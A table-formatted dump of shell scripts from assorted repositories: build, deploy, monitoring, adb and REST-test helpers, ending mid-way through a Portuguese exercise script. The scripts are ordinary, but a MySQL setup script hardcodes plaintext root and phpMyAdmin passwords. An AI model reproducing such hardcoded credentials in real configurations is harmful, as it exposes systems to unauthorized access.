blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
8559e22aa52e3e4ae8156bcb17d79791c010e467
|
Shell
|
haithemsekri/MyTools
|
/nas-disks/wait_until_idle.sh
|
UTF-8
| 520
| 2.609375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
while true;
do
echo "wait until idle"
#/usr/bin/wait_until_idle 95 32768 100 #Delay time until sleep 10x100=16.6mins
/usr/bin/wait_until_idle 95 2048 60 10 100
echo "idle"
systemctl stop smbd nmbd
/usr/bin/udev-disk-attach.sh --cmd poweroff --dev all --keep no
ethtool -s enp2s0 wol g
systemctl hybrid-sleep
echo "enter sleep: " $(date)
sleep 2
sleep 2
echo "exit sleep: " $(date)
/usr/bin/udev-disk-attach.sh --cmd poweron --dev all --keep no
systemctl restart smbd nmbd
echo "Mount OK Restart"
done
| true
|
c030131faa0e80faf85dd0042fb4b9a161f194de
|
Shell
|
the-bugs-bunny/core-php
|
/.scripts/composer_post_install_cmd.sh
|
UTF-8
| 155
| 2.921875
| 3
|
[] |
no_license
|
#!/bin/bash
# Composer post-install hook: install the project's git pre-commit hook.
# Skipped silently when there is no .git/hooks directory (e.g. an export
# or tarball install rather than a working clone).
DIR="$PWD/.git/hooks/"
if [ -d "$DIR" ]; then
  # Reuse $DIR instead of re-spelling the path, and quote everything.
  cp ./.scripts/git_pre_commit.sh "${DIR}pre-commit"
  chmod +x "${DIR}pre-commit"
fi
| true
|
e59cc7301324c6634c2ab7fa43846ec2a2232dfb
|
Shell
|
intrig-unicamp/ixp-ptt-br
|
/analysis/Adjacencies/peeringMatrixByProfile/runPeeringMatrix.sh
|
UTF-8
| 1,173
| 3.453125
| 3
|
[
"CC-BY-4.0"
] |
permissive
|
#!/bin/bash
# Build the per-profile peering matrix for one IXP state (e.g. "sp").
# Expects data/, order/ and profile_separator/ folders in the CWD and the
# companion scripts next to $BASEDIR.
if [ $# -ne 1 ]; then
  echo "Usage $0 <state>"
  echo "e.g., $0 sp"
  exit 1
fi
read -p "Confirm that you have profile_separator, data and order folders and press [Enter] key ..."
state=$1
# Fail early — and with a non-zero status, unlike the original bare `exit` —
# if any required input file is missing.
if [ ! -f "data/ptt_$state.txt" ]; then
  echo Data file not found!
  echo Expected: data/ptt_$state.txt
  exit 1
fi
if [ ! -f "order/order_$state.txt" ]; then
  echo File containing order of ASes not found!
  echo Expected: order/order_$state.txt
  exit 1
fi
if [ ! -f "profile_separator/profile_separator_$state.txt" ]; then
  echo File containing profiles of ASes not found!
  echo Expected: profile_separator/profile_separator_$state.txt
  exit 1
fi
BASEDIR=/disk/PTT/ixp-ptt-br/analysis/Adjacencies/peeringMatrixByProfile
# Pipeline: raw matrix -> per-profile split -> drop all-zero rows -> scale ->
# gnuplot file. Intermediates are removed at the end.
"$BASEDIR/peeringMatrixByProfile.sh" "data/ptt_$state.txt" "order/order_$state.txt"
tmp1=matrix_profile_tmp
"$BASEDIR/profile_separator.sh" "profile_separator/profile_separator_$state.txt" "peeringMatrix_$state.txt" > "$tmp1"
"$BASEDIR/removeZeros.sh" "$tmp1" > noZeros
"$BASEDIR/connectivityScale.sh" noZeros > "matrix_$state.txt"
"$BASEDIR/generatePlt.sh" "matrix_$state.txt" "profile_separator/profile_separator_$state.txt"
rm -f "$tmp1" noZeros 2> /dev/null
| true
|
2da1d429365493937466056674b10c381eab2152
|
Shell
|
Junch/ios-cmake
|
/toolchain/build-gtest.sh
|
UTF-8
| 3,804
| 4.21875
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Fetch Google Test (with Google Mock) sources and prepare the output tree
# for building iOS static libraries.
if ! type cmake > /dev/null; then
  echo "cmake is not installed. Please install it first."
  exit 1
fi
echo "$(tput setaf 2)"
echo "###################################################################"
echo "# Preparing to build Google Test for iOS"
echo "###################################################################"
echo "$(tput sgr0)"
# The results will be stored relative to the location
# where you stored this script, **not** relative to
# the location of the protobuf git repo.
PREFIX="$(pwd)/googletest"
if [ -d "${PREFIX}" ]
then
  rm -rf "${PREFIX}"
fi
mkdir -p "${PREFIX}/platform"
GTEST_VERSION=1.8.0
GTEST_RELEASE_URL=https://github.com/google/googletest/archive/release-${GTEST_VERSION}.tar.gz
GTEST_RELEASE_DIRNAME=googletest-release-${GTEST_VERSION}
GTEST_SRC_DIR=/tmp/googletest
echo "PREFIX ..................... ${PREFIX}"
echo "GTEST_VERSION .............. ${GTEST_VERSION}"
echo "GTEST_RELEASE_URL .......... ${GTEST_RELEASE_URL}"
echo "GTEST_RELEASE_DIRNAME ...... ${GTEST_RELEASE_DIRNAME}"
echo "GTEST_SRC_DIR .............. ${GTEST_SRC_DIR}"
while true; do
  # Abort on EOF (non-interactive runs) instead of looping forever.
  read -p "Proceed with build? (y/n) " yn || exit 1
  case $yn in
    [Yy]* ) break;;
    [Nn]* ) exit;;
    * ) echo "Please answer yes or no.";;
  esac
done
echo "$(tput setaf 2)"
echo "###################################################################"
echo "# Fetch Google Test"
echo "###################################################################"
echo "$(tput sgr0)"
(
  if [ -d "${GTEST_SRC_DIR}" ]
  then
    rm -rf "${GTEST_SRC_DIR}"
  fi
  # BUG FIX: original was `cd `dirname $GTEST_SRC_DIR}``; the stray '}' made
  # dirname receive "/tmp/googletest}" and cd into the wrong place. Also fail
  # loudly if the cd does not succeed.
  cd "$(dirname "${GTEST_SRC_DIR}")" || exit 1
  if [ -d "${GTEST_RELEASE_DIRNAME}" ]
  then
    rm -rf "${GTEST_RELEASE_DIRNAME}"
  fi
  curl --location "${GTEST_RELEASE_URL}" --output "${GTEST_RELEASE_DIRNAME}.tar.gz"
  tar xf "${GTEST_RELEASE_DIRNAME}.tar.gz"
  mv "${GTEST_RELEASE_DIRNAME}" "${GTEST_SRC_DIR}"
  #rm ${GTEST_RELEASE_DIRNAME}.tar.gz
)
#######################################
# Configure and build googletest for one iOS platform in its own build
# folder, then copy the produced static libraries into ${PREFIX}/platform.
# Globals:   GTEST_SRC_DIR, PREFIX (read)
# Arguments: $1 - IOS_PLATFORM value for the toolchain (e.g. SIMULATOR)
#            $2 - build folder name (e.g. i386-sim)
#            $3 - human-readable description for the banner
#######################################
function build_lib()
{
  local PLATFORM=$1
  local FOLDER=$2
  local DESC=$3
  echo "$(tput setaf 2)"
  echo "###################################################################"
  echo "# ${DESC}"
  echo "###################################################################"
  echo "$(tput sgr0)"
  (
    mkdir "${GTEST_SRC_DIR}/${FOLDER}" > /dev/null
    # Bail out of the subshell if we cannot enter the build folder —
    # otherwise cmake/make would run against the wrong directory.
    pushd "${GTEST_SRC_DIR}/${FOLDER}" > /dev/null || exit 1
    cmake .. -DCMAKE_TOOLCHAIN_FILE="${PREFIX}/../ios.cmake" -DIOS_PLATFORM="${PLATFORM}"
    make
    local outDir="${PREFIX}/platform/${FOLDER}"
    mkdir -p "${outDir}"
    cp -R googlemock/libgmock*.a "${outDir}"
    cp -R googlemock/gtest/libgtest*.a "${outDir}"
    popd > /dev/null
  )
}
# Build one static-library set per platform. The folder names below are the
# ones build_lib creates under ${PREFIX}/platform and that create_universal
# reads from, so they must stay in sync.
build_lib SIMULATOR i386-sim "i386 for iOS Simulator"
build_lib SIMULATOR64 x86_64-sim "x86_64 for iOS Simulator"
build_lib OS arm-ios "armv7 armv7s x86_64 arm64 for iOS"
echo "$(tput setaf 2)"
echo "###################################################################"
echo "# Create Universal Libraries and Finalize the packaging"
echo "###################################################################"
echo "$(tput sgr0)"
# Merge one library's per-platform builds into a single fat binary.
# Arguments: $1 - library file name (e.g. libgtest.a). Must be run from
# ${PREFIX}/platform, where the i386-sim/x86_64-sim/arm-ios folders live.
function create_universal()
{
MODULE=$1
lipo -create i386-sim/"${MODULE}" x86_64-sim/"${MODULE}" arm-ios/"${MODULE}" -output universal/"${MODULE}"
}
(
cd ${PREFIX}/platform
mkdir universal
arr=(libgtest.a libgtest_main.a libgmock.a libgmock_main.a)
for i in "${arr[@]}"
do
create_universal $i
done
)
# Final layout: ${PREFIX}/lib (fat libraries) + ${PREFIX}/include (headers);
# the intermediate per-platform tree is removed, and lipo -info prints the
# architectures contained in each produced library as a sanity check.
(
cd ${PREFIX}
mkdir lib
mkdir include
cp -R platform/universal/* lib
cp -R ${GTEST_SRC_DIR}/googlemock/include/* include
cp -R ${GTEST_SRC_DIR}/googletest/include/* include
rm -rf platform
lipo -info lib/libgtest.a
lipo -info lib/libgtest_main.a
lipo -info lib/libgmock.a
lipo -info lib/libgmock_main.a
)
echo Done!
| true
|
fe017154f99109b394ee6727133709b6cf668b96
|
Shell
|
geodis/tools
|
/monitoreo-servers_tmux.sh
|
UTF-8
| 2,227
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
# Build a tmux monitoring dashboard: split the current window into seven
# panes and start glances / log watchers over ssh on the ldap, mail and
# proxy servers. Must be run from inside an existing tmux session.
# Paneles
# +---------------------+-----------------------+
# | 0 | 1 |
# +---------------------+-----------------------+
# | 2 | |
# +---------------------+ 4 |
# | 3 | |
# +---------------------+-----------------------+
# | 5 | 6 |
# +---------------------+-----------------------+
connect_ldap="ssh root@ldap-server"
connect_mail="ssh root@mail"
connect_proxy="ssh root@proxy"
# Seconds to wait for each ssh login before typing the follow-up command.
time_out=2
# Test the command directly instead of the original
# `tmux has-session` / `[ $? == 0 ]` two-step (`==` in `[` is a bashism).
if tmux has-session
then
# Division
tmux split-window -v -p 30
tmux select-pane -t 0
tmux split-window -v -p 60
tmux select-pane -t 0
tmux select-pane -t 1
tmux select-pane -t 2
tmux select-pane -t 0
tmux split-window -h -p 50
tmux select-pane -t 2
tmux split-window -h -p 50
tmux select-pane -t 2
tmux split-window -v -p 20
tmux select-pane -t 5
tmux split-window -h -p 50
tmux display-panes
# +-------------------+
# | ldap-server |
# +-------------------+
tmux select-pane -t 0
tmux send-keys "$connect_ldap" C-m
sleep $time_out
tmux send-keys "glances" C-m
# +-------------+
# | mail |
# +-------------+
#
tmux select-pane -t 2
tmux send-keys "$connect_mail" C-m
sleep $time_out
tmux send-keys "glances" C-m
tmux select-pane -t 3
tmux send-keys "$connect_mail" C-m
sleep $time_out
tmux send-keys 'watch -n100 "ls /var/lib/mailman/data/held*"' C-m
tmux select-pane -t 4
tmux send-keys "$connect_mail" C-m
sleep $time_out
tmux send-keys "mail_queue_watch.sh" C-m
# +-------------+
# | proxy |
# +-------------+
#
tmux select-pane -t 5
tmux send-keys "$connect_proxy" C-m
sleep $time_out
tmux send-keys 'glances' C-m
tmux select-pane -t 6
tmux send-keys "$connect_proxy" C-m
sleep $time_out
tmux send-keys 'nload' C-m
# FIX
tmux select-pane -t 1
# tmux send-keys "$connect_ldap" C-m
# sleep $time_out
tmux send-keys "logout" C-m
# /FIX
fi
| true
|
56c508c725c55508bebccaa0ac5cd36f3456e975
|
Shell
|
Yagami2013/scripts
|
/operate_app.sh
|
UTF-8
| 814
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
# BUG FIX: shebang was `#/bin/bash` (missing `!`), i.e. just a comment, so
# the script ran under whatever shell invoked it.
#
# Helpers for measuring an Android app through adb: launch time, network
# traffic, battery readings, plus install/close/uninstall utilities.
# Default target package; every function accepts an override as $1 and
# (by design of the original) updates the shared $pkg global.
pkg="com.zfdang.zsmth_android";
# Print TotalTime (ms) reported by `am start -W` for the app's MainActivity.
getStartTime(){
[ -n "$1" ] && pkg=$1;
local MainPage=${pkg}"/.MainActivity";
startTime=$(adb shell am start -W "$MainPage" | grep "TotalTime" | awk -F: '{print $2}');
echo $startTime;
}
# Print the app's total rx+tx traffic in KB summed from xt_qtaguid stats.
getFlow(){
uid=$(adb shell dumpsys package "$pkg" | grep userId | awk -F '=' '{print $2}');
flow=$(adb shell cat /proc/net/xt_qtaguid/stats | grep "$uid" | awk '{data[NR]+=$6+$8;sum=0;}END{for(k in data) sum+=data[k];print (sum/1024)}');
echo $flow;
}
# Print a field from `dumpsys battery` (defaults to the charge "level").
getBattery(){
local param;
# Plain if/else instead of the original `[ -n "$1" ]&&param=$1||param=...`
# chain — clearer and immune to the a&&b||c pitfall.
if [ -n "$1" ]; then param=$1; else param="level"; fi
adb shell dumpsys battery | grep -E "$param" | awk -F: '{print $2}';
}
# Force-stop the app.
closeApp(){
[ -n "$1" ] && pkg=$1;
adb shell am force-stop "$pkg";
}
# Install an apk (defaults to the bundled zsmth apk).
installApp(){
local apk;
if [ -n "$1" ]; then apk=$1; else apk="./apk/zsmth.apk"; fi
adb install "$apk"
}
# Uninstall the package.
uninstall(){
[ -n "$1" ] && pkg=$1;
adb shell pm uninstall "$pkg";
}
| true
|
3c4a28bdadd69c18135104661bca23f0c6357017
|
Shell
|
sanketshahc/deeplearning_cnns
|
/organize_classes.sh
|
UTF-8
| 271
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
# Sort test images into per-class folders:
#   resources/test_images/cat_12.jpg -> resources/test_images/cat/cat_12.jpg
MYDIR="${PWD}";
for FLE in "${MYDIR}"/resources/test_images/*.jpg;
do
# Skip the literal pattern when no .jpg files match (unmatched glob).
[ -e "${FLE}" ] || continue
# Class name = basename with the trailing _<number>.jpg stripped.
FNAME=$(basename "${FLE}" | sed 's/_[0-9].*//g');
DEST="${MYDIR}/resources/test_images/${FNAME}"
# Quote paths throughout so filenames with spaces do not word-split.
mkdir -pv "${DEST}";
mv "${FLE}" "${DEST}";
done
| true
|
ee6b99b774c505fa0d445af94bb93b29fd00a5c3
|
Shell
|
jinahya/jinahya
|
/com.googlecode.jinahya.test/basic-restful-webapp/items.sh
|
UTF-8
| 3,924
| 2.859375
| 3
|
[] |
no_license
|
#!/bin/sh
# Smoke-test the /items REST endpoint on localhost:58080: create, read,
# update and delete items in both XML and JSON representations, then fetch
# the XSD/JSD schemas. Pretty-printing goes through xmllint / json.tool.
# NOTE(review): the two sizes below are computed but never used afterwards —
# possibly leftovers from an earlier version; kept to preserve behavior.
item_xml_size=$(stat -c%s "src/test/resources/item.xml")
item_json_size=$(stat -c%s "src/test/resources/item.json")
echo ------------------------------------ creating on /items with an xml content
curl -i -X POST http://localhost:58080/items -H "Content-type: application/xml" --data "@src/test/resources/item.xml"
#echo -------------------------------------------- reading /items/1 in xml format
#curl -s http://localhost:58080/items/1 -H "Accept: application/xml" | xmllint --format -
echo ------------------------------------------- reading /items/1 in json format
curl -s http://localhost:58080/items/1 -H "Accept: application/json" | python -m json.tool
echo ------------------------------------- updating /items/1 with a json content
curl -i -X PUT http://localhost:58080/items/1 -H "Content-type: application/json" --data "@src/test/resources/item.json"
echo -------------------------------------------- reading /items/1 in xml format
curl -s http://localhost:58080/items/1 -H "Accept: application/xml" | xmllint --format -
#echo ------------------------------------------- reading /items/1 in json format
#curl -s http://localhost:58080/items/1 -H "Accept: application/json" | python -m json.tool
curl -s http://localhost:58080/items -H "Accept: application/json" | python -m json.tool
echo ------------------------------------ creating on /items with a json content
curl -i -X POST http://localhost:58080/items -H "Content-type: application/json" --data "@src/test/resources/item.json"
#echo -------------------------------------------- reading /items/2 in xml format
#curl -s http://localhost:58080/items/2 -H "Accept: application/xml" | xmllint --format -
echo ------------------------------------------- reading /items/2 in json format
curl -s http://localhost:58080/items/2 -H "Accept: application/json" | python -m json.tool
echo ------------------------------------- updating /items/2 with an xml content
curl -i -X PUT http://localhost:58080/items/2 -H "Content-type: application/xml" --data "@src/test/resources/item.xml"
echo -------------------------------------------- reading /items/2 in xml format
curl -s http://localhost:58080/items/2 -H "Accept: application/xml" | xmllint --format -
#echo ------------------------------------------- reading /items/2 in json format
#curl -s http://localhost:58080/items/2 -H "Accept: application/json" | python -m json.tool
echo ------------------------------------------- reading all items in xml format
curl -s http://localhost:58080/items -H "Accept: application/xml" | xmllint --format -
curl -s http://localhost:58080/items -H "Accept: application/xml" | xmllint --format - > target/items.xml
echo ------------------------------------------ reading all items in json format
curl -s http://localhost:58080/items -H "Accept: application/json" | python -m json.tool
curl -s http://localhost:58080/items -H "Accept: application/json" | python -m json.tool > target/items.json
echo --------------------------------------------------------- deleting /items/1
curl -i -X DELETE http://localhost:58080/items/1
echo --------------------------------------------------- trying to read /items/1
curl --fail http://localhost:58080/items/1
echo --------------------------------------------------------- deleting /items/2
curl -i -X DELETE http://localhost:58080/items/2
echo --------------------------------------------------- trying to read /items/2
curl --fail http://localhost:58080/items/2
echo ------------------------------------------- reading all items in xml format
curl -s http://localhost:58080/items -H "Accept: application/xml" | xmllint --format -
echo ------------------------------------------ reading all items in json format
curl -s http://localhost:58080/items -H "Accept: application/json" | python -m json.tool
curl -s http://localhost:58080/items.xsd | xmllint --format -
curl -s http://localhost:58080/items.jsd | python -m json.tool
| true
|
262d836f374a03516081ae948d7947a0b3be2667
|
Shell
|
kylemarsh/broodmon
|
/netmon.sh
|
UTF-8
| 679
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/sh
# Hacky little script to check if the network connection is working and
# kick the wifi interface if it's not. Hopefully this fixes some of the
# dropout issues I see sometimes.
# Portability fixes for #!/bin/sh: `echo -n` is not POSIX (printf is), and
# POSIX sleep takes a plain number, not the GNU "5s" suffix.
LOG=/home/pi/monitoring/pingmon.log
if ! ping 192.168.1.1 -c2
then
	printf 'Network down at %s..' "$(date)" >> "$LOG";
	ifdown wlan0; printf 'dropping wlan0 (%s)..' "$?" >> "$LOG";
	sleep 5;
	ifup wlan0; printf 'raising wlan0 (%s)\n' "$?" >> "$LOG";
fi
#### Notes ####
#ping 192.168.1.1 -c2 | tail -2 | head -1 >> /home/pi/monitoring/pingmon.log
#ping 192.168.1.1 -c2 || (ifdown wlan0; ifup wlan0)
#tail -1 monitoring/pingmon.log | grep '0% packet loss' && echo foo
| true
|
a390c58bf012806d4a556241a4717e0e1d881f2f
|
Shell
|
jamalansari84/ubuntu-setup
|
/extras/mysql.sh
|
UTF-8
| 1,794
| 2.9375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Ubuntu LAMP helper: apt maintenance, a phpMyAdmin Apache tweak, and a
# collection of (mostly commented-out) MySQL root-password experiments.
# Update the system package set and drop unused packages.
function update {
sudo apt update
sudo apt upgrade -y
sudo apt autoremove -y
}
# Show the firewall state and restart/report Apache and MySQL.
function status {
sudo ufw status
sudo systemctl restart apache2 mysql
sudo systemctl --no-pager status apache2 mysql
}
# Variables
# --------------------------------------
# NOTE(review): plaintext credentials checked into the script — consider
# reading these from the environment or a protected file instead.
MYSQL_USER_NAME="admin"
MYSQL_USER_PASSWORD="senha123*A"
MYSQL_ROOT_PASSWORD="@SuperSenhaRoot*098"
PHPMYADMIN_PASSWORD="@SuperSenhaPhpMyAdmin*099"
# First php.ini found by locate; currently unused below — TODO confirm intent.
PHPINI="$(locate -l 1 php.ini)"
# --------------------------------------
# Securing PhpMyAdmin
# --------------------------------------
# Insert "AllowOverride All" after DirectoryIndex so .htaccess protection works.
sudo systemctl stop apache2
sudo sed -i 's/DirectoryIndex index.php/DirectoryIndex index.php\n AllowOverride All/g' /etc/apache2/conf-available/phpmyadmin.conf
sudo systemctl start apache2
update
status
# --------------------------------------
#sudo mysqladmin -u root password $MYSQL_ROOT_PASSWORD
#sudo mysql -u root --password=$MYSQL_ROOT_PASSWORD -e "ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY '$MYSQL_ROOT_PASSWORD';"
# Working
# --------------------------------------
#sudo mysql -u root -e "ALTER USER 'root'@'localhost' IDENTIFIED BY '$MYSQL_ROOT_PASSWORD';"
#sudo systemctl stop mysql
#sudo mysqld -init-file=~/mysql-pwd
#sudo systemctl start mysql
#mysql -u root --password=$MYSQL_ROOT_PASSWORD
# --------------------------------------
#sudo systemctl restart mysql
#sudo mysql -u root -e "UPDATE mysql.user SET Password=PASSWORD('$MYSQL_ROOT_PASSWORD') WHERE User='root'"
#sudo mysql -u root -e "SET PASSWORD FOR root@localhost = PASSWORD('$MYSQL_ROOT_PASSWORD');FLUSH PRIVILEGES;"
#sudo mysql -u root -B -N -e "SHOW STATUS LIKE 'Uptime'"
#sudo mysql -u root --password=$MYSQL_ROOT_PASSWORD -e "SELECT User, Authentication_string, Plugin FROM mysql.user"
#CD /var/www
#sudo chow $USER:$USER html/ -R
| true
|
f90b1b4b6fd84a7024feb46f18bcbdb7ecbf74fc
|
Shell
|
hxin/OntoSuite-Miner
|
/lib/ensembl-api/ensembl-functgenomics/scripts/environments/config.sequencing.example
|
UTF-8
| 2,011
| 2.78125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/local/bin/bash
# Copyright [1999-2013] Wellcome Trust Sanger Institute and the EMBL-European Bioinformatics Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# NOTE: this file is meant to be *sourced* (hence `return`, not `exit`).
if [ -z "$EFG_SRC" ] || [ ! -d $EFG_SRC ]; then
echo ":: You have not yet initialised the eFG environment"
return
fi
. $EFG_SRC/scripts/environments/sequencing.env
export DB_PASS=$1
if [[ ! $DB_PASS ]]; then
echo "Need to pass a password as parameter"
return 1
fi
### THIS IS AN EXAMPLE CONFIG FILE
### PLEASE MAKE A COPY OF THIS (e.g. my_homo_sapiens_68.sequencing)
### BEFORE ADDING ANY SPECIFIC CONFIG
export SPECIES='homo_sapiens'
#schema version of the database and has to change for each new release
export SCHEMA_BUILD='68_37'
#filename of the fasta assembly file
export ASSEMBLY="GRCh37_${SCHEMA_BUILD}"
#change for human
export DB_HOST=your_db_host
export DB_PORT=3306
export DB_USER=your_write_user
export DB_READ_USER=your_read_users
export DB_NAME="your_${SPECIES}_funcgen_${SCHEMA_BUILD}"
#core data base parameters with read only permissions
#Change/add to template
#mirror copy of the ensembl for internal use
export DNADB_HOST=your_dnadb_host # e.g. ensembldb.ensembl.org
#DB name of the core database
# BUG FIX: was ${SEPCIES} (typo), which expanded empty and produced a DB
# name like "_core_68_37" instead of "homo_sapiens_core_68_37".
export DNADB_NAME="${SPECIES}_core_${SCHEMA_BUILD}"
export DNADB_USER=ensro
export DNADB_PORT=3306
#real data
export DATA_HOME=/path/to/your/work/area
#Only if need to override in general sequencing.config
#export VALID_PEAK_ANALYSIS='SWEMBL_R015 SWEMBL_R0025 CCAT_HISTONE'
_InitEnv
| true
|
6bf9b717c116b71f58d1a785a76e4b2183ac4135
|
Shell
|
berrym/zsh-config
|
/.zsh/third-party/third-party.zsh
|
UTF-8
| 322
| 2.859375
| 3
|
[] |
no_license
|
# Source third-party zsh plugins (autosuggestions and syntax highlighting)
# from $ZDOTDIR (falling back to $ZSH_THIRD_PARTY_DIR).
# BUG FIX: shell identifiers cannot contain hyphens — the original
# `syntax-highlighting=...` and `third-party-scripts=(...)` assignments were
# invalid, and the loop read $third_party_scripts (underscores), which was
# never set, so nothing was ever sourced. Underscores are used throughout now.
local autosuggest=zsh-autosuggestions/zsh-autosuggestions.zsh
local syntax_highlighting=zsh-syntax-highlighting/zsh-syntax-highlighting.zsh
third_party_scripts=(
${ZDOTDIR:-$ZSH_THIRD_PARTY_DIR}/$autosuggest
${ZDOTDIR:-$ZSH_THIRD_PARTY_DIR}/$syntax_highlighting
)
for f in $third_party_scripts; do
. $f
done
| true
|
a879eb1179e9d91c4414beac077db35a28565ba9
|
Shell
|
alidad1401/OpenNeuro_analyses
|
/reuse_analyses/reuse_identification/check_no_match.sh
|
UTF-8
| 515
| 3.609375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# For every title listed in no_match.txt: derive the expected PDF filename,
# open it from papers/all_papers/, and optionally re-download it from a URL
# typed by the user (read from the terminal, since stdin feeds the loop).
cat no_match.txt | while read -r line; do
# Strip punctuation and squeeze runs of spaces to rebuild the stored filename.
file="$(echo "$line" | gsed 's/[^[:alnum:][:space:]]\+//g' | tr -s ' ' )"
file_no_trailing_space="${file%% }.pdf"
file_no_outer_spaces="${file_no_trailing_space## }"
open "papers/all_papers/$file_no_outer_spaces"
echo "$line"
read -r -p "If you need to re-download the paper, enter the url here. Otherwise, just hit 'return': " url </dev/tty
if [ -n "$url" ]; then
# BUG FIX: the original used $paper_name, which is never set anywhere, so
# it removed/wrote "papers/all_papers/" itself. Use the filename computed
# above so the correct PDF is replaced.
rm "papers/all_papers/$file_no_outer_spaces"
curl "$url" -o "papers/all_papers/$file_no_outer_spaces"
fi
done
| true
|
2eab1b9f8d798c81a05faf66b93fc33570d03545
|
Shell
|
jakethekoenig/personal-site
|
/backend/deploy.sh
|
UTF-8
| 407
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
# Deploy the comment-catching Lambda: zip the function sources and push the
# archive to AWS with the CLI. Runs relative to this script's own location.
RUN_DIR=$(pwd)   # NOTE(review): captured but unused — TODO confirm if needed
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
cd "$SCRIPT_DIR" || exit 1
# Deploy lambda endpoint that catches comments
cd catchcomments || exit 1
code="cloudtmp.zip"
# Remove any stale archive so old files can't leak into the bundle
# (resolves the original TODO about a pre-existing zip).
rm -f "$code"
zip "$code" -r *
aws lambda update-function-code --function-name arn:aws:lambda:us-east-2:472039641776:function:addComment --zip-file "fileb://$code" --region us-east-2
rm "$code"
| true
|
3de529c0da57fd191797d8d81310e589df0aa456
|
Shell
|
wookayin/tensorflow-io
|
/.travis/python.release.sh
|
UTF-8
| 2,707
| 2.890625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# Build release wheels of tensorflow-io for python 2.7/3.x inside a plain
# ubuntu:14.04 container, then repair them with auditwheel.
# Fail on the first error and echo every command (release builds are loud).
set -e -x
# Release:
# docker run -i -t --rm -v $PWD:/v -w /v --net=host ubuntu:14.04 /v/.travis/python.release.sh
export BAZEL_VERSION=0.20.0 BAZEL_OS=linux
# Bootstrap the container: toolchain plus every python we build wheels for.
DEBIAN_FRONTEND=noninteractive apt-get -y -qq update
DEBIAN_FRONTEND=noninteractive apt-get -y -qq install \
software-properties-common > /dev/null
DEBIAN_FRONTEND=noninteractive add-apt-repository -y ppa:deadsnakes/ppa
DEBIAN_FRONTEND=noninteractive apt-get -y -qq update
DEBIAN_FRONTEND=noninteractive apt-get -y -qq install \
gcc g++ make patch \
python \
python3 \
python3.5 \
python3.6 \
unzip \
curl > /dev/null
curl -sOL https://github.com/bazelbuild/bazel/releases/download/${BAZEL_VERSION}/bazel-${BAZEL_VERSION}-installer-${BAZEL_OS}-x86_64.sh
chmod +x bazel-${BAZEL_VERSION}-installer-${BAZEL_OS}-x86_64.sh
# Install bazel, display log only if error
./bazel-${BAZEL_VERSION}-installer-${BAZEL_OS}-x86_64.sh 2>&1 > bazel-install.log || (cat bazel-install.log && false)
rm -rf bazel-${BAZEL_VERSION}-installer-${BAZEL_OS}-x86_64.sh
rm -rf bazel-install.log
# Build and install patchelf (needed by auditwheel to rewrite rpaths).
curl -OL https://nixos.org/releases/patchelf/patchelf-0.9/patchelf-0.9.tar.bz2
tar xfa patchelf-0.9.tar.bz2
(cd patchelf-0.9 && ./configure --prefix=/usr && make && make install)
rm -rf patchelf-0.9*
# Give every python its own pip via get-pip.py (14.04's pips are too old).
curl -sOL https://bootstrap.pypa.io/get-pip.py
python3.6 get-pip.py
python3.5 get-pip.py
python3 get-pip.py
python get-pip.py
rm -rf get-pip.py
python3 -m pip install -q auditwheel==1.5.0
python3 -m pip install -q wheel==0.31.1
# Optionally pin the tensorflow build dependency via $TENSORFLOW_INSTALL.
if [[ ! -z ${TENSORFLOW_INSTALL} ]]; then
python -m pip install -q ${TENSORFLOW_INSTALL}
fi
# Compile the native bits once with bazel, then build one wheel per python.
./configure.sh
bazel build \
--noshow_progress \
--noshow_loading_progress \
--verbose_failures \
--test_output=errors -- \
//tensorflow_io/...
python setup.py --data bazel-bin -q bdist_wheel "$@"
python3 setup.py --data bazel-bin -q bdist_wheel "$@"
python3.5 setup.py --data bazel-bin -q bdist_wheel "$@"
python3.6 setup.py --data bazel-bin -q bdist_wheel "$@"
# Tag/repair each wheel for manylinux distribution.
for f in dist/*.whl; do
auditwheel repair $f
done
| true
|
efde33520be71c50b23d096c76a6e6ef4645a18b
|
Shell
|
luc-zago/exercicios-trybe
|
/Módulo 1 - Fundamentos de desenvolvimento web/Bloco 1 - Unix, Bash e Shell Script/exercicio4.sh
|
UTF-8
| 505
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/bash
# Asks for a path, reports whether it exists and whether it is writable.
echo "Programa que verifica se o caminho até um arquivo existe e, caso o caminho exista, verifica se você tem permissão para editar o arquivo"
echo "O caminho para qual diretório você gostaria de verificar?"
read -r arq
# BUG FIX: the original test was `[ "`pwd` $arq"=true ]` — a single
# non-empty string with no spaces around `=`, so it was ALWAYS true.
